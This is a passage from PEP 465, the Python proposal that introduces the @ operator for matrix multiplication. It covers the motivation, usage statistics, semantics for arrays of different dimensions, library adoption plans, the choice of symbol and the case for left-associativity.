Nonetheless, network effects mean that it is very important that we +pick just one convention. In numpy, for example, it is technically +possible to switch between the conventions, because numpy provides two +different types with different __mul__ methods. For +numpy.ndarray objects, * performs elementwise multiplication, +and matrix multiplication must use a function call (numpy.dot). +For numpy.matrix objects, * performs matrix multiplication, +and elementwise multiplication requires function syntax. Writing code +using numpy.ndarray works fine. Writing code using +numpy.matrix also works fine. But trouble begins as soon as we +try to integrate these two pieces of code together. Code that expects +an ndarray and gets a matrix, or vice-versa, may crash or +return incorrect results. Keeping track of which functions expect +which types as inputs, and return which types as outputs, and then +converting back and forth all the time, is incredibly cumbersome and +impossible to get right at any scale. Functions that defensively try +to handle both types as input and DTRT, find themselves floundering +into a swamp of isinstance and if statements.
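To make the fragmentation concrete, here is a small sketch of the two conventions side by side, using numpy’s actual types (outputs shown in comments):

import numpy as np

a = np.array([[1, 2], [3, 4]])   # ndarray: * means elementwise
m = np.matrix([[1, 2], [3, 4]])  # matrix: * means matrix product

print(a * a)         # [[ 1  4] [ 9 16]] -- elementwise squares
print(m * m)         # [[ 7 10] [15 22]] -- true matrix product
print(np.dot(a, a))  # [[ 7 10] [15 22]] -- matrix product via funcall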

+

PEP 238 split / into two operators: / and //. Imagine the +chaos that would have resulted if it had instead split int into +two types: classic_int, whose __div__ implemented floor +division, and new_int, whose __div__ implemented true +division. This, in a more limited way, is the situation that Python +number-crunchers currently find themselves in.

+

In practice, the vast majority of projects have settled on the +convention of using * for elementwise multiplication, and function +call syntax for matrix multiplication (e.g., using numpy.ndarray +instead of numpy.matrix). This reduces the problems caused by API +fragmentation, but it doesn’t eliminate them. The strong desire to +use infix notation for matrix multiplication has caused a number of +specialized array libraries to continue to use the opposing convention +(e.g., scipy.sparse, pyoperators, pyviennacl) despite the problems +this causes, and numpy.matrix itself still gets used in +introductory programming courses, often appears in StackOverflow +answers, and so forth. Well-written libraries thus must continue to +be prepared to deal with both types of objects, and, of course, are +also stuck using unpleasant funcall syntax for matrix multiplication. +After nearly two decades of trying, the numerical community has still +not found any way to resolve these problems within the constraints of +current Python syntax (see Rejected alternatives to adding a new +operator below).

+

This PEP proposes the minimum effective change to Python syntax that +will allow us to drain this swamp. It splits * into two +operators, just as was done for /: * for elementwise +multiplication, and @ for matrix multiplication. (Why not the +reverse? Because this way is compatible with the existing consensus, +and because it gives us a consistent rule that all the built-in +numeric operators also apply in an elementwise manner to arrays; the +reverse convention would lead to more special cases.)

+

So that’s why matrix multiplication doesn’t and can’t just use *. +Now, in the rest of this section, we’ll explain why it nonetheless +meets the high bar for adding a new operator.

+
+
+

Why should matrix multiplication be infix?

+

Right now, most numerical code in Python uses syntax like +numpy.dot(a, b) or a.dot(b) to perform matrix multiplication. +This obviously works, so why do people make such a fuss about it, even +to the point of creating API fragmentation and compatibility swamps?

+

Matrix multiplication shares two features with ordinary arithmetic +operations like addition and multiplication on numbers: (a) it is used +very heavily in numerical programs – often multiple times per line of +code – and (b) it has an ancient and universally adopted tradition of +being written using infix syntax. This is because, for typical +formulas, this notation is dramatically more readable than any +function call syntax. Here’s an example to demonstrate:

+

One of the most useful tools for testing a statistical hypothesis is +the linear hypothesis test for OLS regression models. It doesn’t +really matter what all those words I just said mean; if we find +ourselves having to implement this thing, what we’ll do is look up +some textbook or paper on it, and encounter many mathematical formulas +that look like:

+
+$S = (H\beta - r)^T (HVH^T)^{-1} (H\beta - r)$
+

Here the various variables are all vectors or matrices (details for +the curious: [5]).

+

Now we need to write code to perform this calculation. In current +numpy, matrix multiplication can be performed using either the +function or method call syntax. Neither provides a particularly +readable translation of the formula:

+
import numpy as np
+from numpy.linalg import inv, solve
+
+# Using dot function:
+S = np.dot((np.dot(H, beta) - r).T,
+           np.dot(inv(np.dot(np.dot(H, V), H.T)), np.dot(H, beta) - r))
+
+# Using dot method:
+S = (H.dot(beta) - r).T.dot(inv(H.dot(V).dot(H.T))).dot(H.dot(beta) - r)
+
+
+

With the @ operator, the direct translation of the above formula +becomes:

+
S = (H @ beta - r).T @ inv(H @ V @ H.T) @ (H @ beta - r)
+
+
+

Notice that there is now a transparent, 1-to-1 mapping between the +symbols in the original formula and the code that implements it.

+

Of course, an experienced programmer will probably notice that this is +not the best way to compute this expression. The repeated computation +of Hβ − r should perhaps be factored out; and, +expressions of the form dot(inv(A), B) should almost always be +replaced by the more numerically stable solve(A, B). When using +@, performing these two refactorings gives us:

+
# Version 1 (as above)
+S = (H @ beta - r).T @ inv(H @ V @ H.T) @ (H @ beta - r)
+
+# Version 2
+trans_coef = H @ beta - r
+S = trans_coef.T @ inv(H @ V @ H.T) @ trans_coef
+
+# Version 3
+S = trans_coef.T @ solve(H @ V @ H.T, trans_coef)
+
+
+

Notice that when comparing between each pair of steps, it’s very easy +to see exactly what was changed. If we apply the equivalent +transformations to the code using the .dot method, then the changes +are much harder to read out or verify for correctness:

+
# Version 1 (as above)
+S = (H.dot(beta) - r).T.dot(inv(H.dot(V).dot(H.T))).dot(H.dot(beta) - r)
+
+# Version 2
+trans_coef = H.dot(beta) - r
+S = trans_coef.T.dot(inv(H.dot(V).dot(H.T))).dot(trans_coef)
+
+# Version 3
+S = trans_coef.T.dot(solve(H.dot(V).dot(H.T)), trans_coef)
+
+
+

Readability counts! The statements using @ are shorter, contain +more whitespace, can be directly and easily compared both to each +other and to the textbook formula, and contain only meaningful +parentheses. This last point is particularly important for +readability: when using function-call syntax, the required parentheses +on every operation create visual clutter that makes it very difficult +to parse out the overall structure of the formula by eye, even for a +relatively simple formula like this one. Eyes are terrible at parsing +non-regular languages. I made and caught many errors while trying to +write out the ‘dot’ formulas above. I know they still contain at +least one error, maybe more. (Exercise: find it. Or them.) The +@ examples, by contrast, are not only correct, they’re obviously +correct at a glance.

+

If we are even more sophisticated programmers, and writing code that +we expect to be reused, then considerations of speed or numerical +accuracy might lead us to prefer some particular order of evaluation. +Because @ makes it possible to omit irrelevant parentheses, we can +be certain that if we do write something like (H @ V) @ H.T, +then our readers will know that the parentheses must have been added +intentionally to accomplish some meaningful purpose. In the dot +examples, it’s impossible to know which nesting decisions are +important, and which are arbitrary.

+

Infix @ dramatically improves matrix code usability at all stages +of programmer interaction.

+
+
+

Transparent syntax is especially crucial for non-expert programmers

+

A large proportion of scientific code is written by people who are +experts in their domain, but are not experts in programming. And +there are many university courses run each year with titles like “Data +analysis for social scientists” which assume no programming +background, and teach some combination of mathematical techniques, +introduction to programming, and the use of programming to implement +these mathematical techniques, all within a 10-15 week period. These +courses are more and more often being taught in Python rather than +special-purpose languages like R or Matlab.

+

For these kinds of users, whose programming knowledge is fragile, the +existence of a transparent mapping between formulas and code often +means the difference between succeeding and failing to write that code +at all. This is so important that such classes often use the +numpy.matrix type which defines * to mean matrix +multiplication, even though this type is buggy and heavily +disrecommended by the rest of the numpy community for the +fragmentation that it causes. This pedagogical use case is, in fact, +the only reason numpy.matrix remains a supported part of numpy. +Adding @ will benefit both beginning and advanced users with +better syntax; and furthermore, it will allow both groups to +standardize on the same notation from the start, providing a smoother +on-ramp to expertise.

+
+
+

But isn’t matrix multiplication a pretty niche requirement?

+

The world is full of continuous data, and computers are increasingly +called upon to work with it in sophisticated ways. Arrays are the +lingua franca of finance, machine learning, 3d graphics, computer +vision, robotics, operations research, econometrics, meteorology, +computational linguistics, recommendation systems, neuroscience, +astronomy, bioinformatics (including genetics, cancer research, drug +discovery, etc.), physics engines, quantum mechanics, geophysics, +network analysis, and many other application areas. In most or all of +these areas, Python is rapidly becoming a dominant player, in large +part because of its ability to elegantly mix traditional discrete data +structures (hash tables, strings, etc.) on an equal footing with +modern numerical data types and algorithms.

+

We all live in our own little sub-communities, so some Python users +may be surprised to realize the sheer extent to which Python is used +for number crunching – especially since much of this particular +sub-community’s activity occurs outside of traditional Python/FOSS +channels. So, to give some rough idea of just how many numerical +Python programmers are actually out there, here are two numbers: In +2013, there were 7 international conferences organized specifically on +numerical Python [3] [4]. At PyCon 2014, ~20% +of the tutorials appear to involve the use of matrices +[6].

+

To quantify this further, we used Github’s “search” function to look +at what modules are actually imported across a wide range of +real-world code (i.e., all the code on Github). We checked for +imports of several popular stdlib modules, a variety of numerically +oriented modules, and various other extremely high-profile modules +like django and lxml (the latter of which is the #1 most downloaded +package on PyPI). Starred lines indicate packages which export +array- or matrix-like objects which will adopt @ if this PEP is +approved:

+
Count of Python source files on Github matching given search terms
+                 (as of 2014-04-10, ~21:00 UTC)
+================ ==========  ===============  =======  ===========
+module           "import X"  "from X import"    total  total/numpy
+================ ==========  ===============  =======  ===========
+sys                 2374638            63301  2437939         5.85
+os                  1971515            37571  2009086         4.82
+re                  1294651             8358  1303009         3.12
+numpy ************** 337916 ********** 79065 * 416981 ******* 1.00
+warnings             298195            73150   371345         0.89
+subprocess           281290            63644   344934         0.83
+django                62795           219302   282097         0.68
+math                 200084            81903   281987         0.68
+threading            212302            45423   257725         0.62
+pickle+cPickle       215349            22672   238021         0.57
+matplotlib           119054            27859   146913         0.35
+sqlalchemy            29842            82850   112692         0.27
+pylab *************** 36754 ********** 41063 ** 77817 ******* 0.19
+scipy *************** 40829 ********** 28263 ** 69092 ******* 0.17
+lxml                  19026            38061    57087         0.14
+zlib                  40486             6623    47109         0.11
+multiprocessing       25247            19850    45097         0.11
+requests              30896              560    31456         0.08
+jinja2                 8057            24047    32104         0.08
+twisted               13858             6404    20262         0.05
+gevent                11309             8529    19838         0.05
+pandas ************** 14923 *********** 4005 ** 18928 ******* 0.05
+sympy                  2779             9537    12316         0.03
+theano *************** 3654 *********** 1828 *** 5482 ******* 0.01
+================ ==========  ===============  =======  ===========
+
+
+

These numbers should be taken with several grains of salt (see +footnote for discussion: [12]), but, to the extent they +can be trusted, they suggest that numpy might be the single +most-imported non-stdlib module in the entire Pythonverse; it’s even +more-imported than such stdlib stalwarts as subprocess, math, +pickle, and threading. And numpy users represent only a +subset of the broader numerical community that will benefit from the +@ operator. Matrices may once have been a niche data type +restricted to Fortran programs running in university labs and military +clusters, but those days are long gone. Number crunching is a +mainstream part of modern Python usage.

+

In addition, there is some precedent for adding an infix operator to handle a more-specialized arithmetic operation: the floor division operator //, like the bitwise operators, is very useful under certain circumstances when performing exact calculations on discrete values. But it seems likely that there are many Python programmers who have never had reason to use // (or, for that matter, the bitwise operators). @ is no more niche than //.

+
+
+

So @ is good for matrix formulas, but how common are those really?

+

We’ve seen that @ makes matrix formulas dramatically easier to +work with for both experts and non-experts, that matrix formulas +appear in many important applications, and that numerical libraries +like numpy are used by a substantial proportion of Python’s user base. +But numerical libraries aren’t just about matrix formulas, and being +important doesn’t necessarily mean taking up a lot of code: if matrix +formulas only occurred in one or two places in the average +numerically-oriented project, then it still wouldn’t be worth adding a +new operator. So how common is matrix multiplication, really?

+

When the going gets tough, the tough get empirical. To get a rough +estimate of how useful the @ operator will be, the table below +shows the rate at which different Python operators are actually used +in the stdlib, and also in two high-profile numerical packages – the +scikit-learn machine learning library, and the nipy neuroimaging +library – normalized by source lines of code (SLOC). Rows are sorted +by the ‘combined’ column, which pools all three code bases together. +The combined column is thus strongly weighted towards the stdlib, +which is much larger than both projects put together (stdlib: 411575 +SLOC, scikit-learn: 50924 SLOC, nipy: 37078 SLOC). [7]

+

The dot row (marked ******) counts how common matrix multiply +operations are in each codebase.

+
====  ======  ============  ====  ========
+  op  stdlib  scikit-learn  nipy  combined
+====  ======  ============  ====  ========
+   =    2969          5536  4932      3376 / 10,000 SLOC
+   -     218           444   496       261
+   +     224           201   348       231
+  ==     177           248   334       196
+   *     156           284   465       192
+   %     121           114   107       119
+  **      59           111   118        68
+  !=      40            56    74        44
+   /      18           121   183        41
+   >      29            70   110        39
+  +=      34            61    67        39
+   <      32            62    76        38
+  >=      19            17    17        18
+  <=      18            27    12        18
+ dot ***** 0 ********** 99 ** 74 ****** 16
+   |      18             1     2        15
+   &      14             0     6        12
+  <<      10             1     1         8
+  //       9             9     1         8
+  -=       5            21    14         8
+  *=       2            19    22         5
+  /=       0            23    16         4
+  >>       4             0     0         3
+   ^       3             0     0         3
+   ~       2             4     5         2
+  |=       3             0     0         2
+  &=       1             0     0         1
+ //=       1             0     0         1
+  ^=       1             0     0         0
+ **=       0             2     0         0
+  %=       0             0     0         0
+ <<=       0             0     0         0
+ >>=       0             0     0         0
+====  ======  ============  ====  ========
+
+
+

These two numerical packages alone contain ~780 uses of matrix +multiplication. Within these packages, matrix multiplication is used +more heavily than most comparison operators (< != <= +>=). Even when we dilute these counts by including the stdlib +into our comparisons, matrix multiplication is still used more often +in total than any of the bitwise operators, and 2x as often as //. +This is true even though the stdlib, which contains a fair amount of +integer arithmetic and no matrix operations, makes up more than 80% of +the combined code base.

+

By coincidence, the numeric libraries make up approximately the same +proportion of the ‘combined’ codebase as numeric tutorials make up of +PyCon 2014’s tutorial schedule, which suggests that the ‘combined’ +column may not be wildly unrepresentative of new Python code in +general. While it’s impossible to know for certain, from this data it +seems entirely possible that across all Python code currently being +written, matrix multiplication is already used more often than // +and the bitwise operations.

+
+
+

But isn’t it weird to add an operator with no stdlib uses?

+

It’s certainly unusual (though extended slicing existed for some time before builtin types gained support for it, Ellipsis is still unused within the stdlib, etc.). But the important thing is whether a change will benefit users, not where the software is being downloaded from. It’s clear from the above that @ will be used, and used heavily. And this PEP provides the critical piece that will allow the Python numerical community to finally reach consensus on a standard duck type for all array-like objects, which is a necessary precondition to ever adding a numerical array type to the stdlib.

+
+
+
+

Compatibility considerations

+

Currently, the only legal use of the @ token in Python code is at +statement beginning in decorators. The new operators are both infix; +the one place they can never occur is at statement beginning. +Therefore, no existing code will be broken by the addition of these +operators, and there is no possible parsing ambiguity between +decorator-@ and the new operators.

+

Another important kind of compatibility is the mental cost paid by +users to update their understanding of the Python language after this +change, particularly for users who do not work with matrices and thus +do not benefit. Here again, @ has minimal impact: even +comprehensive tutorials and references will only need to add a +sentence or two to fully document this PEP’s changes for a +non-numerical audience.

+
+
+

Intended usage details

+

This section is informative, rather than normative – it documents the +consensus of a number of libraries that provide array- or matrix-like +objects on how @ will be implemented.

+

This section uses the numpy terminology for describing arbitrary +multidimensional arrays of data, because it is a superset of all other +commonly used models. In this model, the shape of any array is +represented by a tuple of integers. Because matrices are +two-dimensional, they have len(shape) == 2, while 1d vectors have +len(shape) == 1, and scalars have shape == (), i.e., they are “0 +dimensional”. Any array contains prod(shape) total entries. Notice +that prod(()) == 1 (for the same reason that sum(()) == 0); scalars +are just an ordinary kind of array, not a special case. Notice also +that we distinguish between a single scalar value (shape == (), +analogous to 1), a vector containing only a single entry (shape == +(1,), analogous to [1]), a matrix containing only a single entry +(shape == (1, 1), analogous to [[1]]), etc., so the dimensionality +of any array is always well-defined. Other libraries with more +restricted representations (e.g., those that support 2d arrays only) +might implement only a subset of the functionality described here.
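A minimal sketch of this terminology, assuming numpy for the arrays and math.prod (Python 3.8+) to spell prod(shape):

import numpy as np
from math import prod

scalar = np.array(3.0)       # shape == (): “0 dimensional”
vec    = np.array([3.0])     # shape == (1,): a single entry, 1d
mat    = np.array([[3.0]])   # shape == (1, 1): a single entry, 2d

for arr in (scalar, vec, mat):
    # every array contains prod(shape) entries; prod(()) == 1
    assert arr.size == prod(arr.shape)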

+
+

Semantics

+

The recommended semantics for @ for different inputs are as follows (a short runnable sketch follows this list):

+
    +
  • 2d inputs are conventional matrices, and so the semantics are +obvious: we apply conventional matrix multiplication. If we write +arr(2, 3) to represent an arbitrary 2x3 array, then arr(2, 3) +@ arr(3, 4) returns an array with shape (2, 4).
  • +
  • 1d vector inputs are promoted to 2d by prepending or appending a ‘1’ +to the shape, the operation is performed, and then the added +dimension is removed from the output. The 1 is always added on the +“outside” of the shape: prepended for left arguments, and appended +for right arguments. The result is that matrix @ vector and vector +@ matrix are both legal (assuming compatible shapes), and both +return 1d vectors; vector @ vector returns a scalar. This is +clearer with examples.
      +
    • arr(2, 3) @ arr(3, 1) is a regular matrix product, and returns +an array with shape (2, 1), i.e., a column vector.
    • +
    • arr(2, 3) @ arr(3) performs the same computation as the +previous (i.e., treats the 1d vector as a matrix containing a +single column, shape = (3, 1)), but returns the result with +shape (2,), i.e., a 1d vector.
    • +
    • arr(1, 3) @ arr(3, 2) is a regular matrix product, and returns +an array with shape (1, 2), i.e., a row vector.
    • +
    • arr(3) @ arr(3, 2) performs the same computation as the +previous (i.e., treats the 1d vector as a matrix containing a +single row, shape = (1, 3)), but returns the result with shape +(2,), i.e., a 1d vector.
    • +
    • arr(1, 3) @ arr(3, 1) is a regular matrix product, and returns +an array with shape (1, 1), i.e., a single value in matrix form.
    • +
    • arr(3) @ arr(3) performs the same computation as the +previous, but returns the result with shape (), i.e., a single +scalar value, not in matrix form. So this is the standard inner +product on vectors.
    • +
    +

    An infelicity of this definition for 1d vectors is that it makes +@ non-associative in some cases ((Mat1 @ vec) @ Mat2 != +Mat1 @ (vec @ Mat2)). But this seems to be a case where +practicality beats purity: non-associativity only arises for strange +expressions that would never be written in practice; if they are +written anyway then there is a consistent rule for understanding +what will happen (Mat1 @ vec @ Mat2 is parsed as (Mat1 @ vec) +@ Mat2, just like a - b - c); and, not supporting 1d vectors +would rule out many important use cases that do arise very commonly +in practice. No-one wants to explain to new users why to solve the +simplest linear system in the obvious way, they have to type +(inv(A) @ b[:, np.newaxis]).flatten() instead of inv(A) @ b, +or perform an ordinary least-squares regression by typing +solve(X.T @ X, X @ y[:, np.newaxis]).flatten() instead of +solve(X.T @ X, X @ y). No-one wants to type (a[np.newaxis, :] +@ b[:, np.newaxis])[0, 0] instead of a @ b every time they +compute an inner product, or (a[np.newaxis, :] @ Mat @ b[:, +np.newaxis])[0, 0] for general quadratic forms instead of a @ +Mat @ b. In addition, sage and sympy (see below) use these +non-associative semantics with an infix matrix multiplication +operator (they use *), and they report that they haven’t +experienced any problems caused by it.

    +
  • +
  • For inputs with more than 2 dimensions, we treat the last two +dimensions as being the dimensions of the matrices to multiply, and +‘broadcast’ across the other dimensions. This provides a convenient +way to quickly compute many matrix products in a single operation. +For example, arr(10, 2, 3) @ arr(10, 3, 4) performs 10 separate +matrix multiplies, each of which multiplies a 2x3 and a 3x4 matrix +to produce a 2x4 matrix, and then returns the 10 resulting matrices +together in an array with shape (10, 2, 4). The intuition here is +that we treat these 3d arrays of numbers as if they were 1d arrays +of matrices, and then apply matrix multiplication in an +elementwise manner, where now each ‘element’ is a whole matrix. +Note that broadcasting is not limited to perfectly aligned arrays; +in more complicated cases, it allows several simple but powerful +tricks for controlling how arrays are aligned with each other; see +[10] for details. (In particular, it turns out that +when broadcasting is taken into account, the standard scalar * +matrix product is a special case of the elementwise multiplication +operator *.)

    If one operand is >2d, and another operand is 1d, then the above +rules apply unchanged, with 1d->2d promotion performed before +broadcasting. E.g., arr(10, 2, 3) @ arr(3) first promotes to +arr(10, 2, 3) @ arr(3, 1), then broadcasts the right argument to +create the aligned operation arr(10, 2, 3) @ arr(10, 3, 1), +multiplies to get an array with shape (10, 2, 1), and finally +removes the added dimension, returning an array with shape (10, 2). +Similarly, arr(2) @ arr(10, 2, 3) produces an intermediate array +with shape (10, 1, 3), and a final array with shape (10, 3).

    +
  • +
  • 0d (scalar) inputs raise an error. Scalar * matrix multiplication +is a mathematically and algorithmically distinct operation from +matrix @ matrix multiplication, and is already covered by the +elementwise * operator. Allowing scalar @ matrix would thus +both require an unnecessary special case, and violate TOOWTDI.
  • +
+
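A short runnable sketch of these shape rules, as implemented by numpy’s ndarray once @ landed (Python 3.5+, numpy 1.10+):

import numpy as np

A = np.ones((2, 3))
B = np.ones((3, 4))
v = np.ones(3)

print((A @ B).shape)  # (2, 4): conventional 2d matrix product
print((A @ v).shape)  # (2,):   v promoted to (3, 1), multiplied, then squeezed
print((v @ v).shape)  # ():     1d @ 1d is the inner product -- a scalar
S = np.ones((10, 2, 3)) @ np.ones((10, 3, 4))
print(S.shape)        # (10, 2, 4): ten independent 2x3 @ 3x4 products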
+
+

Adoption

+

We group existing Python projects which provide array- or matrix-like +types based on what API they currently use for elementwise and matrix +multiplication.

+

Projects which currently use * for elementwise multiplication, and +function/method calls for matrix multiplication:

+

The developers of the following projects have expressed an intention +to implement @ on their array-like types using the above +semantics:

+
    +
  • numpy
  • +
  • pandas
  • +
  • blaze
  • +
  • theano
  • +
+

The following projects have been alerted to the existence of the PEP, +but it’s not yet known what they plan to do if it’s accepted. We +don’t anticipate that they’ll have any objections, though, since +everything proposed here is consistent with how they already do +things:

+
    +
  • pycuda
  • +
  • panda3d
  • +
+

Projects which currently use * for matrix multiplication, and +function/method calls for elementwise multiplication:

+

The following projects have expressed an intention, if this PEP is +accepted, to migrate from their current API to the elementwise-*, +matmul-@ convention (i.e., this is a list of projects whose API +fragmentation will probably be eliminated if this PEP is accepted):

+
    +
  • numpy (numpy.matrix)
  • +
  • scipy.sparse
  • +
  • pyoperators
  • +
  • pyviennacl
  • +
+

The following projects have been alerted to the existence of the PEP, +but it’s not known what they plan to do if it’s accepted (i.e., this +is a list of projects whose API fragmentation may or may not be +eliminated if this PEP is accepted):

+
    +
  • cvxopt
  • +
+

Projects which currently use * for matrix multiplication, and which +don’t really care about elementwise multiplication of matrices:

+

There are several projects which implement matrix types, but from a +very different perspective than the numerical libraries discussed +above. These projects focus on computational methods for analyzing +matrices in the sense of abstract mathematical objects (i.e., linear +maps over free modules over rings), rather than as big bags full of +numbers that need crunching. And it turns out that from the abstract +math point of view, there isn’t much use for elementwise operations in +the first place; as discussed in the Background section above, +elementwise operations are motivated by the bag-of-numbers approach. +So these projects don’t encounter the basic problem that this PEP +exists to address, making it mostly irrelevant to them; while they +appear superficially similar to projects like numpy, they’re actually +doing something quite different. They use * for matrix +multiplication (and for group actions, and so forth), and if this PEP +is accepted, their expressed intention is to continue doing so, while +perhaps adding @ as an alias. These projects include:

+
    +
  • sympy
  • +
  • sage
  • +
+
+
+
+

Implementation details

+

New functions operator.matmul and operator.__matmul__ are +added to the standard library, with the usual semantics.

+

A corresponding function PyObject* PyObject_MatrixMultiply(PyObject +*o1, PyObject *o2) is added to the C API.

+

A new AST node is added named MatMult, along with a new token +ATEQUAL and new bytecode opcodes BINARY_MATRIX_MULTIPLY and +INPLACE_MATRIX_MULTIPLY.

+

Two new type slots are added; whether this is to PyNumberMethods +or a new PyMatrixMethods struct remains to be determined.
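As a sketch of the user-facing side of these hooks, here is a hypothetical toy type (Mat2 is illustrative only, not anything defined by this PEP) implementing __matmul__:

import operator

class Mat2:
    """A toy 2x2 matrix, only to show how a type hooks into @."""
    def __init__(self, a, b, c, d):
        self.a, self.b, self.c, self.d = a, b, c, d

    def __matmul__(self, other):
        # conventional 2x2 matrix product
        return Mat2(self.a * other.a + self.b * other.c,
                    self.a * other.b + self.b * other.d,
                    self.c * other.a + self.d * other.c,
                    self.c * other.b + self.d * other.d)

m = Mat2(1, 2, 3, 4)
i = Mat2(1, 0, 0, 1)                  # identity
assert (m @ i).b == 2                 # infix @ dispatches to __matmul__
assert operator.matmul(m, i).c == 3   # operator.matmul mirrors the operator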

+
+
+

Rationale for specification details

+
+

Choice of operator

+

Why @ instead of some other spelling? There isn’t any consensus +across other programming languages about how this operator should be +named [11]; here we discuss the various options.

+

Restricting ourselves only to symbols present on US English keyboards, the punctuation characters that don’t already have a meaning in Python expression context are: @, backtick, $, !, and ?. Of these options, @ is clearly the best; ! and ? are already heavily freighted with inapplicable meanings in the programming context, backtick has been banned from Python by BDFL pronouncement (see PEP 3099), and $ is uglier, even more dissimilar to * and ⋅, and has Perl/PHP baggage. $ is probably the second-best option of these, though.

+

Symbols which are not present on US English keyboards start at a +significant disadvantage (having to spend 5 minutes at the beginning +of every numeric Python tutorial just going over keyboard layouts is +not a hassle anyone really wants). Plus, even if we somehow overcame +the typing problem, it’s not clear there are any that are actually +better than @. Some options that have been suggested include:

+
    +
  • U+00D7 MULTIPLICATION SIGN: A × B
  • +
  • U+22C5 DOT OPERATOR: A ⋅ B
  • +
  • U+2297 CIRCLED TIMES: A ⊗ B
  • +
  • U+00B0 DEGREE: A ° B
  • +
+

What we need, though, is an operator that means “matrix +multiplication, as opposed to scalar/elementwise multiplication”. +There is no conventional symbol with this meaning in either +programming or mathematics, where these operations are usually +distinguished by context. (And U+2297 CIRCLED TIMES is actually used +conventionally to mean exactly the wrong things: elementwise +multiplication – the “Hadamard product” – or outer product, rather +than matrix/inner product like our operator). @ at least has the +virtue that it looks like a funny non-commutative operator; a naive +user who knows maths but not programming couldn’t look at A * B +versus A × B, or A * B versus A B, or A * B versus +A ° B and guess which one is the usual multiplication, and which +one is the special case.

+

Finally, there is the option of using multi-character tokens. Some +options:

+
    +
  • Matlab and Julia use a .* operator. Aside from being visually +confusable with *, this would be a terrible choice for us +because in Matlab and Julia, * means matrix multiplication and +.* means elementwise multiplication, so using .* for matrix +multiplication would make us exactly backwards from what Matlab and +Julia users expect.
  • +
  • APL apparently used +.×, which by combining a multi-character +token, confusing attribute-access-like . syntax, and a unicode +character, ranks somewhere below U+2603 SNOWMAN on our candidate +list. If we like the idea of combining addition and multiplication +operators as being evocative of how matrix multiplication actually +works, then something like +* could be used – though this may +be too easy to confuse with *+, which is just multiplication +combined with the unary + operator.
  • +
  • PEP 211 suggested ~*. This has the downside that it sort of +suggests that there is a unary * operator that is being combined +with unary ~, but it could work.
  • +
  • R uses %*% for matrix multiplication. In R this forms part of a +general extensible infix system in which all tokens of the form +%foo% are user-defined binary operators. We could steal the +token without stealing the system.
  • +
  • Some other plausible candidates that have been suggested: >< (= +ascii drawing of the multiplication sign ×); the footnote operator +[*] or |*| (but when used in context, the use of vertical +grouping symbols tends to recreate the nested parentheses visual +clutter that was noted as one of the major downsides of the function +syntax we’re trying to get away from); ^*.
  • +
+

So, it doesn’t matter much, but @ seems as good or better than any +of the alternatives:

+
    +
  • It’s a friendly character that Pythoneers are already used to typing +in decorators, but the decorator usage and the math expression +usage are sufficiently dissimilar that it would be hard to confuse +them in practice.
  • +
  • It’s widely accessible across keyboard layouts (and thanks to its +use in email addresses, this is true even of weird keyboards like +those in phones).
  • +
  • It’s round like * and ⋅.
  • +
  • The mATrices mnemonic is cute.
  • +
  • The swirly shape is reminiscent of the simultaneous sweeps over rows +and columns that define matrix multiplication
  • +
  • Its asymmetry is evocative of its non-commutative nature.
  • +
  • Whatever, we have to pick something.
  • +
+
+
+

Precedence and associativity

+

There was a long discussion [15] about +whether @ should be right- or left-associative (or even something +more exotic [18]). Almost all Python operators are +left-associative, so following this convention would be the simplest +approach, but there were two arguments that suggested matrix +multiplication might be worth making right-associative as a special +case:

+

First, matrix multiplication has a tight conceptual association with +function application/composition, so many mathematically sophisticated +users have an intuition that an expression like RSx proceeds +from right-to-left, with first S transforming the vector +x, and then R transforming the result. This isn’t +universally agreed (and not all number-crunchers are steeped in the +pure-math conceptual framework that motivates this intuition +[16]), but at the least this +intuition is more common than for other operations like 2⋅3⋅4 which everyone reads as going from left-to-right.

+

Second, if expressions like Mat @ Mat @ vec appear often in code, then programs will run faster (and efficiency-minded programmers will be able to use fewer parentheses) if this is evaluated as Mat @ (Mat @ vec) than if it is evaluated like (Mat @ Mat) @ vec.

+

However, weighing against these arguments are the following:

+

Regarding the efficiency argument, empirically, we were unable to find any evidence that Mat @ Mat @ vec type expressions actually dominate in real-life code. Parsing a number of large projects that use numpy, we found that when forced by numpy’s current funcall syntax to choose an order of operations for nested calls to dot, people actually use left-associative nesting slightly more often than right-associative nesting [17]. And anyway, writing parentheses isn’t so bad – if an efficiency-minded programmer is going to take the trouble to think through the best way to evaluate some expression, they probably should write down the parentheses regardless of whether they’re needed, just to make it obvious to the next reader that the order of operations matters.

+

In addition, it turns out that other languages, including those with +much more of a focus on linear algebra, overwhelmingly make their +matmul operators left-associative. Specifically, the @ equivalent +is left-associative in R, Matlab, Julia, IDL, and Gauss. The only +exceptions we found are Mathematica, in which a @ b @ c would be +parsed non-associatively as dot(a, b, c), and APL, in which all +operators are right-associative. There do not seem to exist any +languages that make @ right-associative and * +left-associative. And these decisions don’t seem to be controversial +– I’ve never seen anyone complaining about this particular aspect of +any of these other languages, and the left-associativity of * +doesn’t seem to bother users of the existing Python libraries that use +* for matrix multiplication. So, at the least we can conclude from +this that making @ left-associative will certainly not cause any +disasters. Making @ right-associative, OTOH, would be exploring +new and uncertain ground.

+

And another advantage of left-associativity is that it is much easier +to learn and remember that @ acts like *, than it is to +remember first that @ is unlike other Python operators by being +right-associative, and then on top of this, also have to remember +whether it is more tightly or more loosely binding than +*. (Right-associativity forces us to choose a precedence, and +intuitions were about equally split on which precedence made more +sense. So this suggests that no matter which choice we made, no-one +would be able to guess or remember it.)

+

On net, therefore, the general consensus of the numerical community is +that while matrix multiplication is something of a special case, it’s +not special enough to break the rules, and @ should parse like +* does.
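
A small illustrative sketch (not part of the PEP) that makes the adopted rule visible: a class whose __matmul__ reports each application shows that a chained @ groups from the left, exactly as * does.

class Tracer:
    def __init__(self, name):
        self.name = name
    def __matmul__(self, other):
        result = Tracer("({} @ {})".format(self.name, other.name))
        print(result.name)
        return result

a, b, c = Tracer("a"), Tracer("b"), Tracer("c")
a @ b @ c
# prints:
#   (a @ b)
#   ((a @ b) @ c)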

+
+
+

(Non)-Definitions for built-in types

+

No __matmul__ or __matpow__ are defined for builtin numeric +types (float, int, etc.) or for the numbers.Number +hierarchy, because these types represent scalars, and the consensus +semantics for @ are that it should raise an error on scalars.
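
This is observable directly at the interpreter prompt; the error message below is CPython’s standard one for an unsupported binary operator:

>>> 1 @ 2
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: unsupported operand type(s) for @: 'int' and 'int'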

+

